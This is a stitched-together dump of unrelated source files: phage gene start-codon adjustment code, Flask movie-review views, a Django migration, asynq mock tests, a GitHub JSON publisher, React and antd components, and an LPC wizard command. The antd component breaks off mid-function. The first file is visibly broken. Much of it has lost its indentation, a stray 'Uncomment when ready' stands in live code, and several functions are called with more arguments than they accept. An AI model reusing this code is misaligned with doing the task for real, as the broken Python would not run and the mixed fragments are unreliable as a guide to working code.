        print(codon)
        if codon in stop_codons:
            print("Found stop codon at {}".format(currentStart))
            break
        elif codon in start_codons and i > ideal_move_distance:
            print("***far")
            farBestGeneStart = currentStart
            break
        elif codon in start_codons and i <= ideal_move_distance:
            print("***on or before")
            closeBestGeneStart = currentStart
    return closeBestGeneStart, farBestGeneStart
def tooLongBackwardNormal(db, gene, ideal_move_distance, start_codons, stop_codons):
    """Shorten a too-long gene stored with start > end by scanning upstream
    (decreasing coordinates) for an alternative start codon.

    Returns (closeBestGeneStart, farBestGeneStart): the last start codon
    found within `ideal_move_distance` codons, and the first one found
    beyond it. Either may be None. Scanning stops at a stop codon.
    """
    # Init bestGeneStart
    farBestGeneStart = None
    closeBestGeneStart = None
    # Loop-invariant: fetch the genome once, not once per candidate codon
    # (the original called get_phage inside the loop).
    phage = get_phage(db, gene['phage_id'])
    phageGenome = phage['seq']
    # Run through all the potential starts
    for i in xrange(1, ideal_move_distance * 2):  # doubled so we have equal search space on both sides
        currentStart = gene['start'] - (3 * i)  # decrease our start 3 at a time
        codon = phageGenome[currentStart:currentStart + 3]  # codon is going backward
        codon = codon[::-1]  # reverse the codon
        print(codon)
        if codon in stop_codons:
            print("Found stop codon at {}".format(currentStart))
            break
        elif codon in start_codons and i > ideal_move_distance:
            print("far")
            farBestGeneStart = currentStart
            break
        elif codon in start_codons and i <= ideal_move_distance:
            print("on or before")
            closeBestGeneStart = currentStart
    return closeBestGeneStart, farBestGeneStart
def tooLongForwardRevComp(db, gene, ideal_move_distance, start_codons, stop_codons):
    """Shorten a too-long reverse-complement gene by scanning forward
    (increasing coordinates) from its `end` for an alternative start codon.

    Caller passes rev-comp codon tables; codons are read on the forward
    strand. Returns (closeBestGeneStart, farBestGeneStart), either of which
    may be None. Scanning stops at a stop codon.
    """
    # Init bestGeneStart
    farBestGeneStart = None
    closeBestGeneStart = None
    # Loop-invariant: fetch the genome once, not once per candidate codon
    # (the original called get_phage inside the loop).
    phage = get_phage(db, gene['phage_id'])
    phageGenome = phage['seq']
    # Run through all the potential starts
    for i in xrange(1, ideal_move_distance * 2):  # doubled so we have equal search space on both sides
        # increase our start 3 at a time; the -2 presumably aligns the
        # inclusive `end` coordinate onto the codon's first base -- TODO confirm
        currentStart = gene['end'] + (3 * i) - 2
        codon = phageGenome[currentStart:currentStart + 3]  # codon is going forward
        print(codon)
        if codon in stop_codons:
            print("Found stop codon at {}".format(currentStart))
            break
        elif codon in start_codons and i > ideal_move_distance:
            print("***far")
            farBestGeneStart = currentStart
            break
        elif codon in start_codons and i <= ideal_move_distance:
            print("***on or before")
            closeBestGeneStart = currentStart
    return closeBestGeneStart, farBestGeneStart
def tooLongBackwardRevComp(db, gene, ideal_move_distance, start_codons, stop_codons):
    """Shorten a too-long reverse-complement gene (start > end orientation)
    by scanning backward (decreasing coordinates) from its `end` for an
    alternative start codon.

    Caller passes rev-comp codon tables; each codon is reversed before the
    lookup. Returns (closeBestGeneStart, farBestGeneStart), either of which
    may be None. Scanning stops at a stop codon.
    """
    # Init bestGeneStart
    farBestGeneStart = None
    closeBestGeneStart = None
    # Loop-invariant: fetch the genome once, not once per candidate codon
    # (the original called get_phage inside the loop).
    phage = get_phage(db, gene['phage_id'])
    phageGenome = phage['seq']
    # Run through all the potential starts
    for i in xrange(1, ideal_move_distance * 2):  # doubled so we have equal search space on both sides
        # decrease our start 3 at a time; the -2 presumably aligns the
        # inclusive `end` coordinate onto the codon's first base -- TODO confirm
        currentStart = gene['end'] - (3 * i) - 2
        codon = phageGenome[currentStart:currentStart + 3]  # codon is going backward
        codon = codon[::-1]  # reverse the codon
        print(codon)
        if codon in stop_codons:
            print("Found stop codon at {}".format(currentStart))
            break
        elif codon in start_codons and i > ideal_move_distance:
            print("far")
            farBestGeneStart = currentStart
            break
        elif codon in start_codons and i <= ideal_move_distance:
            print("on or before")
            closeBestGeneStart = currentStart
    return closeBestGeneStart, farBestGeneStart
def tooLong(db, gene, ideal_move_distance, start_codons, stop_codons,revcomp_start_codons,revcomp_stop_codons):
if gene['rev_comp'] == False:
if gene['start'] < gene['end']:
print "Forward"
return tooLongForwardNormal(db, gene, ideal_move_distance, start_codons, stop_codons)
elif gene['start'] > gene['end']:
print "Backward"
return tooLongBackwardNormal(db, gene, ideal_move_distance, start_codons, stop_codons)
else:
if gene['start'] < gene['end']:
print "Forward"
return tooLongForwardRevComp(db, gene, ideal_move_distance, revcomp_start_codons, revcomp_stop_codons)
elif gene['start'] > gene['end']:
print "Backward"
return tooLongBackwardRevComp(db, gene, ideal_move_distance, revcomp_start_codons, revcomp_stop_codons)
def tooShortForwardNormal(db, gene, ideal_move_distance, start_codons, stop_codons):
# Init bestGeneStart
farBestGeneStart = None
closeBestGeneStart = None
# Run through all the potential starts
for i in xrange(1,ideal_move_distance*2): # doubled to we have equal search space on both sides
currentStart = gene['start'] - (3 * i) # decrease our start 3 at a time
phage = get_phage(db, gene['phage_id'])
phageGenome = phage['seq']
codon = phageGenome[currentStart:currentStart+3]
print codon
if codon in stop_codons:
print "Found stop codon at {}".format(currentStart)
break
elif codon in start_codons and i > ideal_move_distance:
print "far"
farBestGeneStart = currentStart
break
elif codon in start_codons and i <= ideal_move_distance:
print "on or before"
closeBestGeneStart = currentStart
return closeBestGeneStart, farBestGeneStart
def tooShortBackwardNormal(db, gene, ideal_move_distance, start_codons, stop_codons):
# Init bestGeneStart
farBestGeneStart = None
closeBestGeneStart = None
# Run through all the potential starts
for i in xrange(1,ideal_move_distance*2): # doubled to we have equal search space on both sides
currentStart = gene['start'] + (3 * i) # increase our start 3 at a time
phage = get_phage(db, gene['phage_id'])
phageGenome = phage['seq']
codon = phageGenome[currentStart:currentStart+3]
codon = codon[::-1] # reverse the codon
print codon
if codon in stop_codons:
print "Found stop codon at {}".format(currentStart)
break
elif codon in start_codons and i > ideal_move_distance:
print "far"
farBestGeneStart = currentStart
break
elif codon in start_codons and i <= ideal_move_distance:
print "on or before"
closeBestGeneStart = currentStart
return closeBestGeneStart, farBestGeneStart
def tooShortForwardRevComp(db, gene, ideal_move_distance, start_codons, stop_codons):
# Init bestGeneStart
farBestGeneStart = None
closeBestGeneStart = None
# Run through all the potential starts
for i in xrange(1,ideal_move_distance*2): # doubled to we have equal search space on both sides
currentStart = gene['end'] - (3 * i) - 2 # decrease our start 3 at a time
phage = get_phage(db, gene['phage_id'])
phageGenome = phage['seq']
codon = phageGenome[currentStart:currentStart+3]
print codon
if codon in stop_codons:
print "Found stop codon at {}".format(currentStart)
break
elif codon in start_codons and i > ideal_move_distance:
print "far"
farBestGeneStart = currentStart
break
elif codon in start_codons and i <= ideal_move_distance:
print "on or before"
closeBestGeneStart = currentStart
return closeBestGeneStart, farBestGeneStart
def tooShortBackwardRevComp(db, gene, ideal_move_distance, start_codons, stop_codons):
# Init bestGeneStart
farBestGeneStart = None
closeBestGeneStart = None
# Run through all the potential starts
for i in xrange(1,ideal_move_distance*2): # doubled to we have equal search space on both sides
currentStart = gene['end'] + (3 * i) - 2 # increase our start 3 at a time
phage = get_phage(db, gene['phage_id'])
phageGenome = phage['seq']
codon = phageGenome[currentStart:currentStart+3]
codon = codon[::-1] # reverse the codon
print codon
if codon in stop_codons:
print "Found stop codon at {}".format(currentStart)
break
elif codon in start_codons and i > ideal_move_distance:
print "far"
farBestGeneStart = currentStart
break
elif codon in start_codons and i <= ideal_move_distance:
print "on or before"
closeBestGeneStart = currentStart
return closeBestGeneStart, farBestGeneStart
def tooShort(db, gene, ideal_move_distance, start_codons, stop_codons):
if gene['rev_comp'] == False:
if gene['start'] < gene['end']:
print "Forward"
return tooShortForwardNormal(db, gene, ideal_move_distance, start_codons, stop_codons)
elif gene['start'] > gene['end']:
print "Backward"
return tooShortBackwardNormal(db, gene, ideal_move_distance, start_codons, stop_codons)
else:
if gene['start'] < gene['end']:
print "Forward"
return tooShortForwardRevComp(db, gene, ideal_move_distance, revcomp_start_codons, revcomp_stop_codons)
elif gene['start'] > gene['end']:
print "Backward"
return tooShortBackwardRevComp(db, gene, ideal_move_distance, revcomp_start_codons, revcomp_stop_codons)
# makes the best possible adjustments for a given cluster, aligning any genes that do not belong to
def adjust_cluster(db,cluster,golden_phage_id,start_codons,stop_codons):
#first we need to make a list of all the golden phage proteins that are in this create_cluster
golden_phages = get_golden_phages(db)
golden_genes = get_golden_genes(golden_phages, cluster)
print golden_genes.values()
print golden_phages
#print golden_genes
if len(golden_genes) == 0: #make sure there is at least one gene from the golden phage in the cluster
return
for gene in cluster:
if gene['phage_id'] not in golden_phages:
potentialStarts = set() # Because if we have muliple golds we will have many different starts to try?
print
print "New Gene"
possible_adjustments = []
for index, gold_ids in enumerate(golden_genes.values()):
print index, gold_ids
for gold_id in gold_ids:
blastp_hit = None
for hit in gene['hits']: #find hit in gene for that gold_id
if hit['subject_id'] == gold_id:
blastp_hit = hit
break
if blastp_hit is not None: # if we found a hit for that gene, continue
#print "Gene", gene['id'], "and gene", gold_id, "has hit", blastp_hit
golden_start = blastp_hit['subject_start']
gene_start = blastp_hit['query_start']
# our gene is too short and we need to move the start upstream
if gene_start == 1 and golden_start == 1:
print "They are already perfectly aligned!"
elif gene_start == 1:
print "Too Short"
ideal_move_distance = golden_start - gene_start
newCloseStart, newFarStart = tooShort(db, gene, ideal_move_distance, start_codons, stop_codons,revcomp_start_codons,revcomp_stop_codons)
if newCloseStart != None:
potentialStarts.add(newCloseStart)
if newFarStart != None:
potentialStarts.add(newFarStart)
# our gene is too long and we need to trim it down
elif golden_start == 1:
print "Too Long"
ideal_move_distance = gene_start - golden_start
newCloseStart, newFarStart = tooLong(db, gene, ideal_move_distance, start_codons, stop_codons,revcomp_start_codons,revcomp_stop_codons)
######## Just to debug #####################
print "Starts:", newCloseStart, newFarStart
print "Original:", gene['start']
###################################
if newCloseStart != None:
potentialStarts.add(newCloseStart)
if newFarStart != None:
potentialStarts.add(newFarStart)
# right now we do nothing...
else:
print "Neither one starts at 1..."
else:
print "Gene", gene['id'], "has no blastp hit for golden gene", gold_id, gene['hits']
if potentialStarts: # if set is not empty
bestStart = findBestStart(db, gene, potentialStarts, ideal_move_distance)
updateStart(db, gene['id'], bestStart, gene['rev_comp']) Uncomment when ready
###############################################################################################################
# Command-line entry point (dev): adjust a single hard-coded cluster.
parser = argparse.ArgumentParser()
parser.add_argument("--clustalo_cutoff", help="Minimum percent identity when clustering", default=32.5)
parser.add_argument("--blastp_cutoff", help="Minimum e-value when clustering", default=1e-35)
args = parser.parse_args()
# Hard coded for dev
start_codons = ['ATG','GTG','TTG'] #CCG
# Reverse-complement counterparts of the start codons above.
revcomp_start_codons = ['CAT', 'CAC', 'CAA']
stop_codons = ['TAG', 'TAA', 'TGA']
# Reverse-complement counterparts of the stop codons above.
revcomp_stop_codons = ['CTA', 'TTA', 'TCA']
cluster_id = 17  # NOTE(review): hard-coded cluster id -- confirm before wider use
db = connect_db("geneysis.db")
cluster = get_cluster(db, cluster_id, args)
golden_phage_id = 5  # NOTE(review): hard-coded golden phage id -- confirm
adjust_cluster(db,cluster,golden_phage_id,start_codons,stop_codons,revcomp_start_codons,revcomp_stop_codons)
|
const getChaincodeConfig = require('./getChaincodeConfig');
const CONSTANTS = require('./../constants/index');
module.exports = function getChaincodeChannel(chaincodeLocation) {
const config = getChaincodeConfig(chaincodeLocation);
if (config != null) {
return config['hf-dev-channel'] || CONSTANTS.DEFAULT_CHANNEL;
}
return CONSTANTS.DEFAULT_CHANNEL;
};
|
from flask import render_template, request, redirect, url_for
from . import main
# from app import main
from ..request import get_movies, get_movie, search_movie
from .forms import ReviewForm
from ..models import Review
# Views
@main.route('/')
def index():
    '''
    View root page function that returns the index page and its data
    '''
    # Getting movie lists by category
    popular_movies = get_movies('popular')
    upcoming_movie = get_movies('upcoming')
    now_showing_movie = get_movies('now_playing')
    title = 'The movie review website'
    # Bugfix: the query string was previously bound to the name
    # `search_movie`, shadowing the imported search_movie() helper.
    movie_query = request.args.get('movie_query')
    if movie_query:
        return redirect(url_for('.search', movie_name=movie_query))
    return render_template('index.html', title=title, popular=popular_movies, upcoming=upcoming_movie, now_showing=now_showing_movie)
@main.route('/movie/<int:id>')
def movie(id):
    '''
    Render the details page for a single movie, including its reviews.
    '''
    found_movie = get_movie(id)
    page_title = f'{found_movie.title}'
    movie_reviews = Review.get_reviews(found_movie.id)
    return render_template('movie.html', title=page_title, movie=found_movie, reviews=movie_reviews)
@main.route('/search/<movie_name>')
def search(movie_name):
    '''
    View function to display the search results
    '''
    # The search API expects '+'-separated terms.
    movie_name_list = movie_name.split(" ")
    movie_name_format = "+".join(movie_name_list)
    searched_movies = search_movie(movie_name_format)
    title = f'Search results for "{movie_name}"'
    # Bugfix: title was computed but never handed to the template.
    return render_template('search.html', movies=searched_movies, title=title)
@main.route('/movie/review/new/<int:id>', methods=['GET', 'POST'])
def new_review(id):
    '''
    Show the review form for a movie; on valid submission save the review
    and go back to the movie page.
    '''
    review_form = ReviewForm()
    reviewed_movie = get_movie(id)
    if not review_form.validate_on_submit():
        page_title = f'{reviewed_movie.title} review'
        return render_template('new_review.html', title=page_title, review_form=review_form, movie=reviewed_movie)
    saved_review = Review(reviewed_movie.id, review_form.title.data, reviewed_movie.poster, review_form.review.data)
    saved_review.save_review()
    return redirect(url_for('.movie', id=reviewed_movie.id))
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    # Adds the many-to-many 'attendees' link between heritage interviews
    # and CRM people (reverse accessor: person.interviews_attended).

    dependencies = [
        ('crm', '0004_auto_20160202_1146'),
        ('heritage', '0031_interview_other_interviewers'),
    ]

    operations = [
        migrations.AddField(
            model_name='interview',
            name='attendees',
            field=models.ManyToManyField(to='crm.Person', related_name='interviews_attended'),
        ),
    ]
|
# Copyright 2016 Quora, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import asynq
from qcore.asserts import assert_eq, assert_is, assert_not_in, AssertRaises
# ===================================================
# Objects to mock
# ===================================================
@asynq.asynq()
def fn():
    """Module-level async stub; patched by string path in the tests below."""
    pass
@asynq.asynq()
def async_caller():
    """Invoke fn() via both the async (yield) and sync paths; return both results."""
    ret = yield fn.asynq()
    return (ret, fn())
def non_async_caller():
    """Invoke fn() synchronously only."""
    return fn()
class Cls(object):
    """Fixture exposing an async classmethod, a plain method and an async method."""

    @asynq.asynq()
    @classmethod
    def async_classmethod(cls):
        """Async classmethod stub used as a patch target."""
        pass

    def non_async_method(self, foo):
        """Plain method stub; patched in TestPatchMethodWithMethod."""
        pass

    @asynq.asynq()
    def async_method(self):
        """Async instance method returning a constant string."""
        return "capybaras"
instance = Cls()
@asynq.asynq()
def class_method_async_caller():
    """Invoke the async classmethod via both the async and sync paths."""
    ret = yield Cls.async_classmethod.asynq()
    return (ret, Cls.async_classmethod())
def class_method_non_async_caller():
    """Invoke the async classmethod synchronously only."""
    return Cls.async_classmethod()
@asynq.asynq()
def method_async_caller():
    """Invoke the async instance method via both the async and sync paths."""
    obj = Cls()
    ret = yield obj.async_method.asynq()
    return (ret, obj.async_method())
def method_non_async_caller():
    """Invoke the async instance method synchronously only."""
    return Cls().async_method()
class Counter(object):
    """Counts calls; linked_class is a class-level patch target."""

    linked_class = Cls  # patched with SecondClass in test_patch_class

    def __init__(self):
        self.count = 0  # number of recorded calls

    def add_call(self):
        """Record one call (used as a callable patch replacement)."""
        self.count += 1
class SecondClass(object):
    """Replacement value for Counter.linked_class in test_patch_class."""
    pass
IMPORTANT_DICTIONARY = {"capybaras": "guinea pigs", "hutias": "coypus"}
# ===================================================
# Helpers for testing that mocks work right.
# ===================================================
class MockChecker(object):
    """Template for verifying mocks of fn, the classmethod and the method."""

    @classmethod
    def check(cls, mock_fn, mock_classmethod, mock_method):
        """Run _check_mock against all three mock targets and their callers."""
        cls._check_mock(mock_fn, async_caller, non_async_caller)
        cls._check_mock(
            mock_classmethod, class_method_async_caller, class_method_non_async_caller
        )
        cls._check_mock(mock_method, method_async_caller, method_non_async_caller)

    @classmethod
    def _check_mock(cls, mock_fn, async_caller, non_async_caller):
        # Subclasses assert the mock behaves correctly via both call paths.
        raise NotImplementedError
class MockCheckerWithAssignment(MockChecker):
    """Checks mocks created without a replacement (return_value/side_effect set)."""

    @classmethod
    def _check_mock(cls, mock_fn, async_caller, non_async_caller):
        mock_fn.return_value = 42
        assert_eq(0, mock_fn.call_count)
        assert_eq(42, non_async_caller())
        assert_eq(1, mock_fn.call_count)
        # async_caller invokes the mock twice (async and sync paths),
        # so the call count jumps from 1 to 3.
        assert_eq((42, 42), async_caller())
        assert_eq(3, mock_fn.call_count)
        mock_fn.side_effect = lambda: 43
        assert_eq(43, non_async_caller())
        assert_eq((43, 43), async_caller())
class MockCheckerWithNew(MockChecker):
    """Checks mocks installed with an explicit replacement that returns 42."""

    @classmethod
    def _check_mock(cls, mock_fn, async_caller, non_async_caller):
        assert_eq(42, non_async_caller())
        assert_eq((42, 42), async_caller())
# ===================================================
# Actual tests.
# ===================================================
def test_mock_async_context():
    # Patch all three targets with auto-created mocks and verify both the
    # async and sync call paths see the mock.
    with asynq.mock.patch(
        "asynq.tests.test_mock.fn"
    ) as mock_fn, asynq.mock.patch.object(
        Cls, "async_classmethod"
    ) as mock_classmethod, asynq.mock.patch.object(
        Cls, "async_method"
    ) as mock_method:
        MockCheckerWithAssignment.check(mock_fn, mock_classmethod, mock_method)
    # Same targets, but with explicit replacement callables (the `new` argument).
    with asynq.mock.patch(
        "asynq.tests.test_mock.fn", lambda: 42
    ) as mock_fn, asynq.mock.patch.object(
        Cls, "async_classmethod", classmethod(lambda _: 42)
    ) as mock_classmethod, asynq.mock.patch.object(
        Cls, "async_method", lambda _: 42
    ) as mock_method:
        MockCheckerWithNew.check(mock_fn, mock_classmethod, mock_method)
@asynq.mock.patch("asynq.tests.test_mock.fn")
@asynq.mock.patch.object(Cls, "async_classmethod")
@asynq.mock.patch("asynq.tests.test_mock.Cls.async_method")
def test_mock_async_decorator(mock_method, mock_classmethod, mock_fn):
    # Decorators apply bottom-up, so the mock arguments arrive in reverse order.
    MockCheckerWithAssignment.check(mock_fn, mock_classmethod, mock_method)
@asynq.mock.patch("asynq.tests.test_mock.fn")
@asynq.mock.patch.object(Cls, "async_classmethod")
@asynq.mock.patch("asynq.tests.test_mock.Cls.async_method")
class TestMockAsyncClassDecorator(object):
    """Class-level patch decorators inject mocks into each test method."""

    def test(self, mock_method, mock_classmethod, mock_fn):
        # Decorators apply bottom-up, so the mock arguments arrive in reverse order.
        MockCheckerWithAssignment.check(mock_fn, mock_classmethod, mock_method)
@asynq.mock.patch("asynq.tests.test_mock.fn", lambda: 42)
@asynq.mock.patch.object(Cls, "async_classmethod", classmethod(lambda _: 42))
@asynq.mock.patch("asynq.tests.test_mock.Cls.async_method", lambda _: 42)
def test_mock_async_decorator_with_new():
    # With explicit replacements no mock objects are injected as arguments.
    MockCheckerWithNew.check(fn, Cls.async_classmethod, Cls().async_method)
@asynq.mock.patch("asynq.tests.test_mock.fn", lambda: 42)
@asynq.mock.patch.object(Cls, "async_classmethod", classmethod(lambda _: 42))
@asynq.mock.patch("asynq.tests.test_mock.Cls.async_method", lambda _: 42)
class TestMockAsyncClassDecoratorWithNew(object):
    """Class-level variant of the explicit-replacement decorator test."""

    def test(self):
        # With explicit replacements no mock objects are injected as arguments.
        MockCheckerWithNew.check(fn, Cls.async_classmethod, Cls().async_method)
def test_mock_async_dict():
    # patch.dict merges by default and restores the original dict on exit.
    assert_eq("guinea pigs", IMPORTANT_DICTIONARY["capybaras"])
    with asynq.mock.patch.dict(
        "asynq.tests.test_mock.IMPORTANT_DICTIONARY", {"capybaras": "maras"}
    ):
        assert_eq("maras", IMPORTANT_DICTIONARY["capybaras"])
        assert_eq("coypus", IMPORTANT_DICTIONARY["hutias"])
    assert_eq("guinea pigs", IMPORTANT_DICTIONARY["capybaras"])
    # clear=True replaces the whole dict instead of merging into it.
    with asynq.mock.patch.dict(
        "asynq.tests.test_mock.IMPORTANT_DICTIONARY", {"capybaras": "maras"}, clear=True
    ):
        assert_eq("maras", IMPORTANT_DICTIONARY["capybaras"])
        assert_not_in("hutias", IMPORTANT_DICTIONARY)
def test_maybe_wrap_new():
    # A callable replacement is wrapped so calling fn() invokes it ...
    counter = Counter()
    with asynq.mock.patch("asynq.tests.test_mock.fn", counter.add_call):
        fn()
        assert_eq(1, counter.count)
    # ... while a non-callable replacement is installed as-is.
    with asynq.mock.patch("asynq.tests.test_mock.fn", "capybara"):
        assert_eq("capybara", fn)
def test_start_stop():
    # Manually started/stopped patch (no context manager or decorator).
    original_fn = fn
    new_fn = asynq.asynq()(lambda: 42)
    patch = asynq.mock.patch("asynq.tests.test_mock.fn", new_fn)
    # NOTE(review): relies on asynq.tests.test_mock being reachable as an
    # attribute chain from the top-level `import asynq` -- confirm.
    assert_is(original_fn, asynq.tests.test_mock.fn)
    patch.start()
    assert_is(new_fn, asynq.tests.test_mock.fn)
    patch.stop()
    assert_is(original_fn, asynq.tests.test_mock.fn)
class TestPatchMethodWithMethod(object):
    """Patching an instance method with a bound method of the test class."""

    def setup(self):
        self.calls = []  # arguments captured by the replacement method

    def mock_method(self, foo):
        # Replacement for Cls.non_async_method; records the argument.
        self.calls.append(foo)

    def test(self):
        with asynq.mock.patch.object(instance, "non_async_method", self.mock_method):
            assert_eq([], self.calls)
            instance.non_async_method("bar")
            assert_eq(["bar"], self.calls)
def test_patch_class():
    # Class attributes that hold classes can be patched too.
    with asynq.mock.patch.object(Counter, "linked_class", SecondClass):
        assert_is(SecondClass, Counter.linked_class)
def test_cant_set_attribute():
    # Setting arbitrary attributes on the mock's .asynq accessor must fail.
    with asynq.mock.patch("asynq.tests.test_mock.fn"):
        with AssertRaises(TypeError):
            fn.asynq.cant_set_attribute = "capybara"
|
"""Create json with information for custom_updater."""
import json
import random
from github import Github
from github.GithubException import UnknownObjectException
from customjson.defaults import COMMIT
class CreateJson:
    """Generate (and optionally publish) the JSON consumed by custom_updater."""

    def __init__(self, token, push, repo=None):
        """Initialize with a GitHub token, a push flag and an optional repo filter."""
        self.token = token
        self.repo = repo
        self.selected = repo
        self.push = push
        self.github = Github(token)

    def _push_file(self, repo_slug, target, raw):
        """Serialize raw and commit it to target in repo_slug when it changed.

        Fetches the current file, compares it with raw via has_changed()
        and only commits when the content actually differs.
        """
        data = json.dumps(raw, indent=4, sort_keys=True)
        if not data:
            print("no data")
            return
        repo = self.github.get_repo(repo_slug)
        repos_json = repo.get_contents(target)
        old = json.loads(repos_json.decoded_content.decode())
        sha = repos_json.sha
        msg = random.choice(COMMIT)
        try:
            if has_changed(old, raw):
                print(repo.update_file(target, msg, data, sha))
            else:
                print("content did not change")
        except UnknownObjectException:
            # Bugfix: the old message had two "{}" placeholders but only one
            # format argument, which raised IndexError instead of printing.
            print("You do not have permissions to push to {}".format(repo_slug))
        except Exception as error:  # pylint: disable=W0703
            print("Something went horrible wrong :(")
            print(error)

    def component(self):
        """Generate json for components in both legacy and store formats."""
        from customjson.components.org import get_data as org
        from customjson.components.isabellaalstrom import get_isabellaalstrom
        from customjson.components.custom_updater import get_data as custom_updater
        organisation = "custom-components"
        # Merge every source; later sources overwrite earlier duplicates.
        components = {}
        for source in (
            org(self.github, self.repo),
            get_isabellaalstrom(self.github, self.repo),
            custom_updater(),
        ):
            for component in source:
                components[component] = source[component]
        legacy = {}
        data = {}
        for component in components:
            info = components[component]
            embedded = info.get("embedded", "")
            # Legacy custom_updater format.
            legacy[component] = {
                "changelog": info.get("changelog", ""),
                "local_location": info.get("embedded_path", ""),
                # Embedded components publish from their embedded path.
                "remote_location": info.get("embedded_path_remote", "") if embedded else info.get("remote_location", ""),
                "updated_at": info.get("updated_at", ""),
                "version": info.get("version", ""),
                "visit_repo": info.get("visit_repo", ""),
                "resources": info.get("resources", []),
            }
            # Newer custom-component-store format.
            data[component] = {
                "author": info.get("author", ""),
                "version": info.get("version", ""),
                "description": info.get("description", ""),
                "image_link": info.get("image_link", ""),
                "local_location": info.get("local_location", ""),
                "remote_location": info.get("remote_location", ""),
                "visit_repo": info.get("visit_repo", ""),
                "changelog": info.get("changelog", ""),
                "resources": info.get("resources", []),
                "embedded": embedded,
                "embedded_path": info.get("embedded_path", ""),
                "embedded_path_remote": info.get("embedded_path_remote", ""),
            }
        if self.push:
            self._push_file(organisation + "/information", "repos.json", legacy)
            self._push_file("ludeeus/data", "custom-component-store/V1/data.json", data)
        else:
            print(json.dumps(legacy, indent=4, sort_keys=True))
            print(json.dumps(data, indent=4, sort_keys=True))

    def card(self):
        """Generate json for cards."""
        from customjson.cards.org import get_data as org
        from customjson.cards.ciotlosm import get_data as ciotlosm
        from customjson.cards.isabellaalstrom import get_isabellaalstrom
        from customjson.cards.maykar import get_data as maykar
        from customjson.cards.thomasloven import get_data as thomasloven
        organisation = "custom-cards"
        data = {}
        for source in (
            org(self.github, self.repo),
            ciotlosm(self.github, self.repo),
            get_isabellaalstrom(self.github, self.repo),
            maykar(self.github, self.repo),
            thomasloven(self.github, self.repo),
        ):
            for card in source:
                data[card] = source[card]
        if self.push:
            target = "repos.json"
            repo_slug = organisation + "/information"
            if self.selected:
                # Only one repo was regenerated: merge the fresh entries on
                # top of what is already published so the rest is not dropped.
                repo = self.github.get_repo(repo_slug)
                old = json.loads(repo.get_contents(target).decoded_content.decode())
                new = data
                data = {}
                for item in old:
                    data[item] = old[item]
                for item in new:
                    data[item] = new[item]
                print(json.dumps(new, indent=4, sort_keys=True))
            self._push_file(repo_slug, target, data)
        else:
            print(json.dumps(data, indent=4, sort_keys=True))
def has_changed(old, new):
    """Return True when the two dict structures differ in any way."""
    import dictdiffer
    differences = list(dictdiffer.diff(old, new))
    return len(differences) != 0
|
import React, { Component } from "react";
import { connect } from "react-redux";
import { Link } from "react-router-dom";
import PropTypes from "prop-types";
import PostItem from "../posts/PostItem";
import CommentForm from "./CommentForm";
import CommentFeed from "./CommentFeed";
import Spinner from "../common/Spinner";
import { getPost } from "../../actions/postActions";
class Post extends Component {
componentDidMount() {
this.props.getPost(this.props.match.params.id);
}
render() {
const { post, loading } = this.props.post;
let postContent;
if (post === null || loading || Object.keys(post).length === 0) {
postContent = <Spinner />;
} else {
postContent = (
<div>
<PostItem post={post} showActions={false} />
<CommentForm postId={post._id} />
<CommentFeed postId={post._id} comments={post.comments} />
</div>
);
}
return (
<div className="post">
<div className="container">
<div className="row">
<div className="col-md-12">
<Link to="/feed" className="btn btn-light mb-3">
Back To Feed
</Link>
{postContent}
</div>
</div>
</div>
</div>
);
}
}
// Runtime prop validation: the action creator and the post slice are required.
Post.propTypes = {
  getPost: PropTypes.func.isRequired,
  post: PropTypes.object.isRequired
};
// Expose only the post slice of the Redux store to this component.
const mapStateToProps = (state) => ({ post: state.post });
// Wire the component to the store: post slice in, getPost action out.
export default connect(
  mapStateToProps,
  { getPost }
)(Post);
|
// Wizard command: remove a named landmark from the surrounding area.
// Returns 1 on success, 0 (with notify_fail) otherwise.
int main( string param ) {
   string desc;
   object area;

   WIZ_CHECK
   if( !param ) {
      notify_fail( "==> [Format] rmlandmark description" );
      return 0;
   }
   // Bugfix: the landmark name was never copied out of the parameter, so
   // query_landmark() was always called with a null description.
   desc = param;
   area = environment(this_player());
   if( !area ) return 0;
   // Climb one environment level if we are not directly in a landmark area.
   if( !area->query_is_landmark() )
      area = environment(area);
   if( !area->query_is_landmark() ) {
      notify_fail("You don't seem to be somewhere that allows adding landmarks.\n");
      return 0;
   }
   if( !area->query_landmark(desc) ) {
      notify_fail("No such landmark.\n");
      return 0;
   }
   area->remove_landmark( desc );
   msg("Removing landmark '"+desc+"'");
   return 1;
}
import React, { PureComponent, Fragment } from 'react';
import { connect } from 'dva';
import { routerRedux } from 'dva/router';
import moment from 'moment';
import {
Row,
Col,
Card,
Form,
Input,
Button,
InputNumber,
DatePicker,
Modal,
message,
Divider,
} from 'antd';
import StandardTable from 'components/StandardTable';
import DictSelect from 'components/DictSelect';
import PageHeaderLayout from '../../layouts/PageHeaderLayout';
// Local aliases for antd compound components.
const RangePicker = DatePicker.RangePicker;
// NOTE(review): import placed below the consts by the original author.
import styles from '../List/TableList.less';
const FormItem = Form.Item;
// Join every value of the object into a single comma-separated string
// (used to flatten antd's array-valued table filters).
const getValue = (obj) => Object.values(obj).join(',');
@connect(({ ogpPatrolPlan, dictionary, loading }) => ({
ogpPatrolPlan,
dictionary,
loading: loading.models.ogpPatrolPlan,
}))
@Form.create()
export default class OgpPatrolPlanList extends PureComponent {
state = {
selectedRows: [],
formValues: {},
};
componentDidMount() {
const { dispatch } = this.props;
dispatch({
type: 'ogpPatrolPlan/fetch',
});
}
handleStandardTableChange = (pagination, filtersArg, sorter) => {
const { dispatch } = this.props;
const { formValues } = this.state;
const filters = Object.keys(filtersArg).reduce((obj, key) => {
const newObj = { ...obj };
newObj[key] = getValue(filtersArg[key]);
return newObj;
}, {});
const params = {
page: pagination.current - 1,
size: pagination.pageSize,
...formValues,
...filters,
};
if (sorter.field) {
params.sorter = `${sorter.field}_${sorter.order}`;
}
dispatch({
type: 'ogpPatrolPlan/fetch',
payload: params,
});
};
handleFormReset = () => {
const { form, dispatch } = this.props;
form.resetFields();
this.setState({
formValues: {},
});
dispatch({
type: 'ogpPatrolPlan/fetch',
payload: {},
});
};
handleRemove = () => {
const { dispatch } = this.props;
const { selectedRows } = this.state;
